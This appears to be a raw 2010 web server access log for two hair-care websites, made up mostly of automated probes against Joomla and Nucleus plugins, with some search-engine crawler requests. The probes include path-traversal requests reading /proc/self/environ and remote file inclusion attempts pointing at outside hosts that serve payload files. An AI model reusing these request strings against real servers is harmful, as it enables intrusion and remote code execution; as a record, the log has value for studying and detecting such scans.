94.155.49.192 - - [28/Jun/2010:04:10:17 -0700] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:10:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
163.24.136.10 - - [28/Jun/2010:04:10:24 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
163.24.136.10 - - [28/Jun/2010:04:10:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
163.24.136.10 - - [28/Jun/2010:04:10:43 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:11:53 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:11:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:11:53 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:12:11 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:12:12 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:12:13 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:04:13:05 -0700] "GET /logs/index.php?option=com_sitemap&itemid=124&lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:04:13:06 -0700] "GET /index.php?option=com_sitemap&itemid=124&lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:14:17 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:14:17 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:14:17 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.175 - - [28/Jun/2010:04:15:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:04:15:53 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:04:15:53 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:04:15:53 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.123.99.42 - - [28/Jun/2010:04:16:17 -0700] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:16:29 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:18:13 -0700] "GET /logs/access.log//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:18:14 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:18:15 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:23:51 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:23:52 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:23:54 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:23:55 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:24:14 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:24:15 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:24:25 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [28/Jun/2010:04:24:26 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:04:24:52 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:04:24:53 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
216.129.119.41 - - [28/Jun/2010:04:25:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
216.129.119.40 - - [28/Jun/2010:04:26:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:04:28:25 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
216.129.119.43 - - [28/Jun/2010:04:34:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:04:36:30 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:04:36:31 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:04:36:31 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:04:36:36 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:38:41 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:38:41 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:43:43 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:43:43 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
175.180.244.58 - - [28/Jun/2010:04:46:47 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.6.104.146 - - [28/Jun/2010:04:47:28 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.212.206.186 - - [28/Jun/2010:04:51:07 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "freehairsecrets.com"
67.218.116.164 - - [28/Jun/2010:04:52:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:05:05:42 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
90.183.39.17 - - [28/Jun/2010:05:08:01 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "holmes/3.12.4 (http://morfeo.centrum.cz/bot)" "freehairsecrets.com"
178.162.68.60 - - [28/Jun/2010:05:08:02 -0700] "GET / HTTP/1.1" 200 926 "-" "-" "freehairsecrets.com"
67.205.67.73 - - [28/Jun/2010:05:14:29 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:05:14:30 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:00 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:00 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:00 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:01 -0700] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:01 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:20 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:20 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:22 -0700] "GET /logs/access_100531.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:34 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:42 -0700] "GET /logs/access_100531.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:18:54 -0700] "GET /logs/access_100531.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:21 -0700] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:21 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:21 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:36 -0700] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:36 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:20:36 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:56 -0700] "GET /logs/access_100301.log//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:56 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:57 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:57 -0700] "GET /logs/access_100301.log//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:58 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:59 -0700] "GET /logs/access_100301.log//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:59 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:23:59 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:24:00 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:24:30 -0700] "GET /logs/access_100301.log//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:24:31 -0700] "GET /index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.145.71.241 - - [28/Jun/2010:05:24:32 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:05:24:59 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:05:24:59 -0700] "GET /?M=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
216.180.240.110 - - [28/Jun/2010:05:27:39 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:27:39 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:27:39 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:27:50 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:27:55 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:30:20 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:30:21 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
